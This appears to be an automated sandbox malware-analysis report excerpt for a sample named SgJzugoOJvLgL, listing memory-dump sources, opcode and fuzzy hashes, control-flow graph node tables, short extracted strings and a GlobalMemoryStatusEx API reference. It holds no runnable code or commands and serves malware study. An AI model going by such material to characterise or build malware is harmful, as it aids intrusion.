                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9fbd97bfa271a38f1aa24e04474e8e56dade07a215050e033586b6f667c6f250
                                                                              • Instruction ID: d8e70745b5e7ab1945890e213a64c8334c0cb1a761d601f243cc5b3ed2a1a253
                                                                              • Opcode Fuzzy Hash: 9fbd97bfa271a38f1aa24e04474e8e56dade07a215050e033586b6f667c6f250
                                                                              • Instruction Fuzzy Hash: 6D22E135F002159FDF64DB64C4906AEBBB2EF89310F2484AAD40AEB354DB31EC46CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c89e882b0b6f67ed648d0cbc0f682d139ed133d73352272dc2799045c6882a78
                                                                              • Instruction ID: d00124d41e247c106d82452cc8e0e9b2b024aa06a1d17e369deaefabb5e73f18
                                                                              • Opcode Fuzzy Hash: c89e882b0b6f67ed648d0cbc0f682d139ed133d73352272dc2799045c6882a78
                                                                              • Instruction Fuzzy Hash: D722A434F101098FEF64CF6DD5807AEB7B6EB89310F248526E419EB395DA35DC818B92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 667ace0-667acfe 1 667ad00-667ad03 0->1 2 667ad05-667ad0e 1->2 3 667ad1d-667ad20 1->3 4 667af17-667af28 2->4 5 667ad14-667ad18 2->5 6 667ad22-667ad26 3->6 7 667ad31-667ad34 3->7 17 667afa5-667afa7 4->17 18 667af2a-667af4e 4->18 5->3 8 667af0c-667af16 6->8 9 667ad2c 6->9 10 667ad36-667ad3b 7->10 11 667ad3e-667ad41 7->11 9->7 10->11 13 667ad55-667ad58 11->13 14 667ad43-667ad50 11->14 15 667ad7b-667ad7e 13->15 16 667ad5a-667ad76 13->16 14->13 20 667ad80-667ad93 15->20 21 667ad98-667ad9b 15->21 16->15 22 667afa8-667afab 17->22 23 667af50-667af53 18->23 20->21 25 667ada1-667ada4 21->25 26 667aefd-667af06 21->26 27 667b214-667b216 22->27 28 667afad-667afaf 22->28 29 667af55-667af5f 23->29 30 667af60-667af63 23->30 36 667ada6-667adaf 25->36 37 667adb4-667adb6 25->37 26->2 26->8 33 667b21d-667b220 27->33 34 667b218 27->34 38 667afb1-667afec 28->38 31 667af65 call 667b238 30->31 32 667af72-667af75 30->32 47 667af6b-667af6d 31->47 39 667af77-667af7b 32->39 40 667af82-667af85 32->40 33->23 42 667b226-667b230 33->42 34->33 36->37 43 667adbd-667adc0 37->43 44 667adb8 37->44 50 667aff2-667affe 38->50 51 667b1df-667b1f2 38->51 39->38 48 667af7d 39->48 40->22 49 667af87-667afa3 40->49 43->1 46 667adc6-667adea 43->46 44->43 61 667adf0-667adff 46->61 62 667aefa 46->62 47->32 48->40 49->17 57 667b000-667b019 50->57 58 667b01e-667b062 50->58 53 667b1f4 51->53 59 667b1f5 53->59 57->53 77 667b064-667b076 58->77 78 667b07e-667b0bd 58->78 59->59 65 667ae17-667ae52 call 6676598 61->65 66 667ae01-667ae07 61->66 62->26 87 667ae54-667ae5a 65->87 88 667ae6a-667ae81 65->88 68 667ae0b-667ae0d 66->68 69 667ae09 66->69 68->65 69->65 77->78 83 667b1a4-667b1b9 78->83 84 667b0c3-667b19e call 6676598 78->84 83->51 84->83 89 667ae5e-667ae60 87->89 90 667ae5c 87->90 97 667ae83-667ae89 88->97 98 667ae99-667aeaa 88->98 89->88 90->88 99 667ae8d-667ae8f 97->99 100 667ae8b 97->100 103 667aec2-667aef3 98->103 104 667aeac-667aeb2 98->104 99->98 100->98 103->62 106 667aeb6-667aeb8 104->106 107 667aeb4 104->107 106->103 107->103
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3823777903
                                                                              • Opcode ID: 485f89d80f9836f184bc9cf3d83423b0ba332d7d8c4899a4e9d292586deee9dc
                                                                              • Instruction ID: 9496bff4517914b53e005ea7404efd2d9cc0b3fb8b34a954b226f898ff282785
                                                                              • Opcode Fuzzy Hash: 485f89d80f9836f184bc9cf3d83423b0ba332d7d8c4899a4e9d292586deee9dc
                                                                              • Instruction Fuzzy Hash: 51E17F30E1020A8FDF69DFA8D9946AEB7B2EF85304F108929D409EB355DB35DC46CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 258 667b660-667b682 259 667b684-667b687 258->259 260 667b6c5-667b6c8 259->260 261 667b689-667b69e 259->261 262 667b6ef-667b6f2 260->262 263 667b6ca-667b6ce 260->263 268 667b9fa-667ba2e 261->268 273 667b6a4-667b6c0 261->273 264 667b6f4-667b6fd 262->264 265 667b708-667b70b 262->265 267 667b6d4-667b6e4 263->267 263->268 269 667b703 264->269 270 667b95b-667b964 264->270 271 667b732-667b735 265->271 272 667b70d-667b711 265->272 280 667b9aa-667b9ae 267->280 281 667b6ea 267->281 296 667ba30-667ba33 268->296 269->265 270->268 277 667b96a-667b971 270->277 278 667b737-667b753 271->278 279 667b758-667b75b 271->279 272->268 276 667b717-667b727 272->276 273->260 300 667b7f2-667b7f5 276->300 301 667b72d 276->301 285 667b976-667b979 277->285 278->279 282 667b75d-667b7b7 call 6676598 279->282 283 667b7bc-667b7bf 279->283 280->268 289 667b9b0-667b9c0 280->289 281->262 282->283 287 667b7c1-667b7c6 283->287 288 667b7c9-667b7cc 283->288 291 667b97b-667b984 285->291 292 667b989-667b98c 285->292 287->288 297 667b7ce-667b7d4 288->297 298 667b7d9-667b7dc 288->298 289->272 313 667b9c6 289->313 291->292 294 667b9a5-667b9a8 292->294 295 667b98e-667b997 292->295 294->280 304 667b9cb-667b9ce 294->304 295->268 303 667b999-667b9a0 295->303 305 667ba56-667ba59 296->305 306 667ba35-667ba51 296->306 297->298 308 667b7de-667b7e8 298->308 309 667b7ed-667b7f0 298->309 311 667b7fa-667b7fd 300->311 301->271 303->294 304->300 314 667b9d4-667b9d7 304->314 315 667bcc5-667bcc7 305->315 316 667ba5f-667ba87 305->316 306->305 308->309 309->300 309->311 317 667b7ff-667b805 311->317 318 667b80a-667b80d 311->318 313->304 314->264 323 667b9dd-667b9df 314->323 321 667bcce-667bcd1 315->321 322 667bcc9 315->322 347 667ba91-667bad5 316->347 348 667ba89-667ba8c 316->348 317->318 324 667b80f-667b813 318->324 325 667b81a-667b81d 318->325 321->296 329 667bcd7-667bce0 321->329 322->321 330 667b9e6-667b9e9 323->330 331 667b9e1 323->331 324->317 326 667b815 324->326 325->300 327 667b81f-667b822 325->327 326->325 327->300 333 667b824-667b827 327->333 330->259 335 667b9ef-667b9f9 330->335 331->330 336 667b83e-667b841 333->336 337 667b829-667b82d 333->337 341 667b863-667b866 336->341 342 667b843-667b85e 336->342 337->268 340 667b833-667b839 337->340 340->336 344 667b8c6-667b8cf 341->344 345 667b868-667b86b 341->345 342->341 344->295 350 667b8d5 344->350 351 667b86d-667b882 345->351 352 667b8aa-667b8ad 345->352 380 667badb-667bae4 347->380 381 667bcba-667bcc4 347->381 348->329 355 667b8da-667b8dd 350->355 351->268 363 667b888-667b8a5 351->363 353 667b8c1-667b8c4 352->353 354 667b8af-667b8b3 352->354 353->344 353->355 354->268 359 667b8b9-667b8bc 354->359 361 667b8ef-667b8f2 355->361 362 667b8df 355->362 359->353 365 667b8f4-667b8f8 361->365 366 667b909-667b90c 361->366 371 667b8e7-667b8ea 362->371 363->352 365->268 367 667b8fe-667b904 365->367 368 667b90e-667b914 366->368 369 667b919-667b91c 366->369 367->366 368->369 373 667b91e-667b924 369->373 374 667b929-667b92c 369->374 371->361 373->374 375 667b936-667b939 374->375 376 667b92e-667b933 374->376 378 667b943-667b946 375->378 379 667b93b-667b93e 375->379 376->375 382 667b956-667b959 378->382 383 667b948-667b951 378->383 379->378 384 667bcb0-667bcb5 380->384 385 667baea-667bb56 call 6676598 380->385 382->270 382->285 383->382 384->381 393 667bc50-667bc65 385->393 394 667bb5c-667bb61 385->394 393->384 396 667bb63-667bb69 394->396 397 667bb7d 394->397 398 667bb6f-667bb71 396->398 399 667bb6b-667bb6d 396->399 400 667bb7f-667bb85 397->400 401 667bb7b 398->401 399->401 402 667bb87-667bb8d 400->402 403 667bb9a-667bba7 400->403 401->400 404 667bb93 402->404 405 667bc3b-667bc4a 402->405 410 667bbbf-667bbcc 403->410 411 667bba9-667bbaf 403->411 404->403 406 667bc02-667bc0f 404->406 407 667bbce-667bbdb 404->407 405->393 405->394 416 667bc27-667bc34 406->416 417 667bc11-667bc17 406->417 419 667bbf3-667bc00 407->419 420 667bbdd-667bbe3 407->420 410->405 412 667bbb3-667bbb5 411->412 413 667bbb1 411->413 412->410 413->410 416->405 421 667bc1b-667bc1d 417->421 422 667bc19 417->422 419->405 423 667bbe7-667bbe9 420->423 424 667bbe5 420->424 421->416 422->416 423->419 424->419
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2392861976
                                                                              • Opcode ID: 848a1b78c6ee5057365bf30795aa14185b6140aebe9d9c72a030eb5ad33b6a39
                                                                              • Instruction ID: fc9f4a698766210ef10e90545d635ef4f5ef343ea530ed0489c821fb8a2cc614
                                                                              • Opcode Fuzzy Hash: 848a1b78c6ee5057365bf30795aa14185b6140aebe9d9c72a030eb5ad33b6a39
                                                                              • Instruction Fuzzy Hash: 6F029C30E002098FDFA4CF68D5846ADB7B2FB85314F24896AE419DB355DB31EC86CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 427 6679160-6679185 428 6679187-667918a 427->428 429 6679190-66791a5 428->429 430 6679a48-6679a4b 428->430 437 66791a7-66791ad 429->437 438 66791bd-66791d3 429->438 431 6679a71-6679a73 430->431 432 6679a4d-6679a6c 430->432 433 6679a75 431->433 434 6679a7a-6679a7d 431->434 432->431 433->434 434->428 436 6679a83-6679a8d 434->436 440 66791b1-66791b3 437->440 441 66791af 437->441 444 66791de-66791e0 438->444 440->438 441->438 445 66791e2-66791e8 444->445 446 66791f8-6679269 444->446 447 66791ec-66791ee 445->447 448 66791ea 445->448 457 6679295-66792b1 446->457 458 667926b-667928e 446->458 447->446 448->446 463 66792b3-66792d6 457->463 464 66792dd-66792f8 457->464 458->457 463->464 469 6679323-667933e 464->469 470 66792fa-667931c 464->470 475 6679363-6679371 469->475 476 6679340-667935c 469->476 470->469 477 6679373-667937c 475->477 478 6679381-66793fb 475->478 476->475 477->436 484 66793fd-667941b 478->484 485 6679448-667945d 478->485 489 6679437-6679446 484->489 490 667941d-667942c 484->490 485->430 489->484 489->485 490->489
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: b23f5ed6c5702fbe5edb02c701026953126b9b338c40bd3e7533c2468bef0cc3
                                                                              • Instruction ID: 714490cf93a61b0f78b1e858051b6bae7b2e8d7805b34e7211c6f40452e75175
                                                                              • Opcode Fuzzy Hash: b23f5ed6c5702fbe5edb02c701026953126b9b338c40bd3e7533c2468bef0cc3
                                                                              • Instruction Fuzzy Hash: 54914D30F1020A9FDBA4DB65D9507AEB7F6AF89344F108569C409EB784EB70DC468B91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 493 667cf48-667cf63 494 667cf65-667cf68 493->494 495 667cfb1-667cfb4 494->495 496 667cf6a-667cfac 494->496 497 667cfd7-667cfda 495->497 498 667cfb6-667cfd2 495->498 496->495 499 667d023-667d026 497->499 500 667cfdc-667cfeb 497->500 498->497 502 667d035-667d038 499->502 503 667d028-667d02a 499->503 505 667cfed-667cff2 500->505 506 667cffa-667d006 500->506 509 667d081-667d084 502->509 510 667d03a-667d07c 502->510 507 667d030 503->507 508 667d2ef-667d2f8 503->508 505->506 512 667d965-667d99e 506->512 513 667d00c-667d01e 506->513 507->502 517 667d307-667d313 508->517 518 667d2fa-667d2ff 508->518 514 667d086-667d0c8 509->514 515 667d0cd-667d0d0 509->515 510->509 528 667d9a0-667d9a3 512->528 513->499 514->515 523 667d0d2-667d114 515->523 524 667d119-667d11c 515->524 520 667d424-667d429 517->520 521 667d319-667d32d 517->521 518->517 544 667d431 520->544 543 667d333-667d345 521->543 521->544 523->524 529 667d165-667d168 524->529 530 667d11e-667d160 524->530 531 667d9a5 call 667dabd 528->531 532 667d9b2-667d9b5 528->532 534 667d1b1-667d1b4 529->534 535 667d16a-667d1ac 529->535 530->529 554 667d9ab-667d9ad 531->554 545 667d9b7-667d9d3 532->545 546 667d9d8-667d9db 532->546 540 667d1b6-667d1bb 534->540 541 667d1be-667d1c1 534->541 535->534 540->541 551 667d1c3-667d1d9 541->551 552 667d1de-667d1e1 541->552 571 667d347-667d34d 543->571 572 667d369-667d36b 543->572 553 667d434-667d440 544->553 545->546 556 667da0e-667da10 546->556 557 667d9dd-667da09 546->557 551->552 564 667d1e3-667d225 552->564 565 667d22a-667d22d 552->565 562 667d446-667d733 553->562 563 667d24a-667d259 553->563 554->532 558 667da17-667da1a 556->558 559 667da12 556->559 557->556 558->528 568 667da1c-667da2b 558->568 559->558 706 667d95a-667d964 562->706 707 667d739-667d73f 562->707 574 667d25b-667d260 563->574 575 667d268-667d274 563->575 564->565 569 667d22f-667d231 565->569 570 667d23c-667d23f 565->570 598 667da92-667daa7 568->598 599 667da2d-667da90 call 6676598 568->599 569->544 579 667d237 569->579 570->553 580 667d245-667d248 570->580 582 667d351-667d35d 571->582 583 667d34f 571->583 593 667d375-667d381 572->593 574->575 575->512 584 667d27a-667d28c 575->584 579->570 580->563 590 667d291-667d294 580->590 591 667d35f-667d367 582->591 583->591 584->590 603 667d296-667d2d8 590->603 604 667d2dd-667d2df 590->604 591->593 617 667d383-667d38d 593->617 618 667d38f 593->618 624 667daa8 598->624 599->598 603->604 612 667d2e6-667d2e9 604->612 613 667d2e1 604->613 612->494 612->508 613->612 623 667d394-667d396 617->623 618->623 623->544 628 667d39c-667d3b8 call 6676598 623->628 624->624 640 667d3c7-667d3d3 628->640 641 667d3ba-667d3bf 628->641 640->520 642 667d3d5-667d422 640->642 641->640 642->544 708 667d741-667d746 707->708 709 667d74e-667d757 707->709 708->709 709->512 710 667d75d-667d770 709->710 712 667d776-667d77c 710->712 713 667d94a-667d954 710->713 714 667d77e-667d783 712->714 715 667d78b-667d794 712->715 713->706 713->707 714->715 715->512 716 667d79a-667d7bb 715->716 719 667d7bd-667d7c2 716->719 720 667d7ca-667d7d3 716->720 719->720 720->512 721 667d7d9-667d7f6 720->721 721->713 724 667d7fc-667d802 721->724 724->512 725 667d808-667d821 724->725 727 667d827-667d84e 725->727 728 667d93d-667d944 725->728 727->512 731 667d854-667d85e 727->731 728->713 728->724 731->512 732 667d864-667d87b 731->732 734 667d87d-667d888 732->734 735 667d88a-667d8a5 732->735 734->735 735->728 740 667d8ab-667d8c4 call 6676598 735->740 744 667d8c6-667d8cb 740->744 745 667d8d3-667d8dc 740->745 744->745 745->512 746 667d8e2-667d936 745->746 746->728
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q
                                                                              • API String ID: 0-831282457
                                                                              • Opcode ID: aa4ab04493a46ae4782a9cf0abbf5c4ad2fe7185f688a1c4473fcab583245021
                                                                              • Instruction ID: ec925250f5244a77eb88d07bf25738c312893f29d6c96a643049109cda5ab1e0
                                                                              • Opcode Fuzzy Hash: aa4ab04493a46ae4782a9cf0abbf5c4ad2fe7185f688a1c4473fcab583245021
                                                                              • Instruction Fuzzy Hash: D9625034A002058FCB55EB68D690A5EB7F2FF84304F208969D019DF769DB75ED8ACB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 754 6674b70-6674b94 755 6674b96-6674b99 754->755 756 6674b9b-6674bb5 755->756 757 6674bba-6674bbd 755->757 756->757 758 6674bc3-6674cbb 757->758 759 667529c-667529e 757->759 777 6674cc1-6674d0e call 6675418 758->777 778 6674d3e-6674d45 758->778 760 66752a5-66752a8 759->760 761 66752a0 759->761 760->755 763 66752ae-66752bb 760->763 761->760 791 6674d14-6674d30 777->791 779 6674d4b-6674dbb 778->779 780 6674dc9-6674dd2 778->780 797 6674dc6 779->797 798 6674dbd 779->798 780->763 794 6674d32 791->794 795 6674d3b-6674d3c 791->795 794->795 795->778 797->780 798->797
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: fcq$XPcq$\Ocq
                                                                              • API String ID: 0-3575482020
                                                                              • Opcode ID: a6c8f5a2622b54b204fa6f31cea0d3d8d421ce6e4c25e5f6af45adf45c8a8428
                                                                              • Instruction ID: 07dbc5ca3c8885d6e51294adfcc41a2e11d5941f8293b8e3c0373dc3f206ea7d
                                                                              • Opcode Fuzzy Hash: a6c8f5a2622b54b204fa6f31cea0d3d8d421ce6e4c25e5f6af45adf45c8a8428
                                                                              • Instruction Fuzzy Hash: 34615134F002189FEB559FA8C8587AEBBF6FB88700F208469D106EB395DF758C458B55
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1698 6679151-6679185 1700 6679187-667918a 1698->1700 1701 6679190-66791a5 1700->1701 1702 6679a48-6679a4b 1700->1702 1709 66791a7-66791ad 1701->1709 1710 66791bd-66791d3 1701->1710 1703 6679a71-6679a73 1702->1703 1704 6679a4d-6679a6c 1702->1704 1705 6679a75 1703->1705 1706 6679a7a-6679a7d 1703->1706 1704->1703 1705->1706 1706->1700 1708 6679a83-6679a8d 1706->1708 1712 66791b1-66791b3 1709->1712 1713 66791af 1709->1713 1716 66791de-66791e0 1710->1716 1712->1710 1713->1710 1717 66791e2-66791e8 1716->1717 1718 66791f8-6679269 1716->1718 1719 66791ec-66791ee 1717->1719 1720 66791ea 1717->1720 1729 6679295-66792b1 1718->1729 1730 667926b-667928e 1718->1730 1719->1718 1720->1718 1735 66792b3-66792d6 1729->1735 1736 66792dd-66792f8 1729->1736 1730->1729 1735->1736 1741 6679323-667933e 1736->1741 1742 66792fa-667931c 1736->1742 1747 6679363-6679371 1741->1747 1748 6679340-667935c 1741->1748 1742->1741 1749 6679373-667937c 1747->1749 1750 6679381-66793fb 1747->1750 1748->1747 1749->1708 1756 66793fd-667941b 1750->1756 1757 6679448-667945d 1750->1757 1761 6679437-6679446 1756->1761 1762 667941d-667942c 1756->1762 1757->1702 1761->1756 1761->1757 1762->1761
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q
                                                                              • API String ID: 0-355816377
                                                                              • Opcode ID: 671ace8248748084773f4547b06ba2acd15f8053f10d64150b4d7a2f13ce5424
                                                                              • Instruction ID: 5fa9a0091626721943636aa03863e6ef843e2e5ba355a0adc60236506b54c323
                                                                              • Opcode Fuzzy Hash: 671ace8248748084773f4547b06ba2acd15f8053f10d64150b4d7a2f13ce5424
                                                                              • Instruction Fuzzy Hash: 9C517230B1010A9FDBA4DB74D990BAEB7FAABC8754F148569C409EB784DA70DC42CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1802 6674b60-6674b94 1804 6674b96-6674b99 1802->1804 1805 6674b9b-6674bb5 1804->1805 1806 6674bba-6674bbd 1804->1806 1805->1806 1807 6674bc3-6674cbb 1806->1807 1808 667529c-667529e 1806->1808 1826 6674cc1-6674d0e call 6675418 1807->1826 1827 6674d3e-6674d45 1807->1827 1809 66752a5-66752a8 1808->1809 1810 66752a0 1808->1810 1809->1804 1812 66752ae-66752bb 1809->1812 1810->1809 1840 6674d14-6674d30 1826->1840 1828 6674d4b-6674dbb 1827->1828 1829 6674dc9-6674dd2 1827->1829 1846 6674dc6 1828->1846 1847 6674dbd 1828->1847 1829->1812 1843 6674d32 1840->1843 1844 6674d3b-6674d3c 1840->1844 1843->1844 1844->1827 1846->1829 1847->1846
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: fcq$XPcq
                                                                              • API String ID: 0-936005338
                                                                              • Opcode ID: d0301fbed561c50042a517f0e620b853d9df89956d0ebaaef0313764a56f27fb
                                                                              • Instruction ID: 73c77d6d944fa4fa8785d79984e6eb046cf8254bb3cb18130f86d21ded3f8ec1
                                                                              • Opcode Fuzzy Hash: d0301fbed561c50042a517f0e620b853d9df89956d0ebaaef0313764a56f27fb
                                                                              • Instruction Fuzzy Hash: 79516E34F002189FDB559FA9C854BAEBBF7EB88700F20842AD146EB395DB758C058F91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1877 294eb39-294eb53 1878 294eb55-294eb7c 1877->1878 1879 294eb7d-294eb93 1877->1879 1900 294eb95 call 294ec20 1879->1900 1901 294eb95 call 294eb39 1879->1901 1882 294eb9a-294eb9c 1883 294eba2-294ec01 1882->1883 1884 294eb9e-294eba1 1882->1884 1891 294ec07-294ec94 GlobalMemoryStatusEx 1883->1891 1892 294ec03-294ec06 1883->1892 1896 294ec96-294ec9c 1891->1896 1897 294ec9d-294ecc5 1891->1897 1896->1897 1900->1882 1901->1882
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4097310468.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2940000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4891fff102712858d4f6f18b376b37715f6698b9a21b14f69f26cfd8e8474f4c
                                                                              • Instruction ID: 522066f0b82f2d1a743bea7708f9e847f4a8dd0b32a7a5dc2d4ad39d294bc488
                                                                              • Opcode Fuzzy Hash: 4891fff102712858d4f6f18b376b37715f6698b9a21b14f69f26cfd8e8474f4c
                                                                              • Instruction Fuzzy Hash: D9412272D003999FCB14DFBAD8046DEBFF5AF89210F1485AAD508A7241EB749885CBE1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 0294EC87
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4097310468.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2940000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemoryStatus
                                                                              • String ID:
                                                                              • API String ID: 1890195054-0
                                                                              • Opcode ID: 817e34f78ac2f5890edd9bd90a6a5c40291673d0c5b32f33a0868f402cfa8bf0
                                                                              • Instruction ID: ea1e266a1986fcc5ca04f029cfb84d6170381ad43cad00c83463d516907d62a6
                                                                              • Opcode Fuzzy Hash: 817e34f78ac2f5890edd9bd90a6a5c40291673d0c5b32f33a0868f402cfa8bf0
                                                                              • Instruction Fuzzy Hash: 3311EFB1C0066A9BCB10DF9AC544BDEFBF4BB48324F14816AD858A7250D778AA44CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PH^q
                                                                              • API String ID: 0-2549759414
                                                                              • Opcode ID: c894c6d3c1e9d7e2f21dc379a2cb3b27da5e9729130512c9b6933aa833552a3d
                                                                              • Instruction ID: 28d7c0dc5fbf85bb20ce472fde56f87b48901b57d30dab5fce28f89b08175435
                                                                              • Opcode Fuzzy Hash: c894c6d3c1e9d7e2f21dc379a2cb3b27da5e9729130512c9b6933aa833552a3d
                                                                              • Instruction Fuzzy Hash: D441D170E003099FDB55DFA9C99469EBBB2FF85700F204829D405EB380EB75E946CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PH^q
                                                                              • API String ID: 0-2549759414
                                                                              • Opcode ID: 51f5804dffc20750d32e997ac15c3d2b04c0622e14eb16c87f93ae7af4a792ef
                                                                              • Instruction ID: 6db6318f77e380031972c826fbb64f09eb6f6c523d878a90119c14d0cb1b5dec
                                                                              • Opcode Fuzzy Hash: 51f5804dffc20750d32e997ac15c3d2b04c0622e14eb16c87f93ae7af4a792ef
                                                                              • Instruction Fuzzy Hash: 7331E330B102018FDB59AB78C56466F7BE7AF89704F208828D406DB394EE35DD46CBA2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: e
                                                                              • API String ID: 0-4024072794
                                                                              • Opcode ID: 05853260cb426e68c7e17492b30e0155903bb08824eb16e48698ccb9f8f7758b
                                                                              • Instruction ID: c5b0a9792edc4dd7c029a0e73bb9e11c1044f21893df4f994158dc0507f0d69a
                                                                              • Opcode Fuzzy Hash: 05853260cb426e68c7e17492b30e0155903bb08824eb16e48698ccb9f8f7758b
                                                                              • Instruction Fuzzy Hash: 1701A734A012499FC750EFBCE90069EBBE6EB85215F104076E80DD7255EB359952CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.4108737608.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_6670000_SgJzugoOJvLgL.jbxd
                                                                              Similarity
                                                                              • API ID:
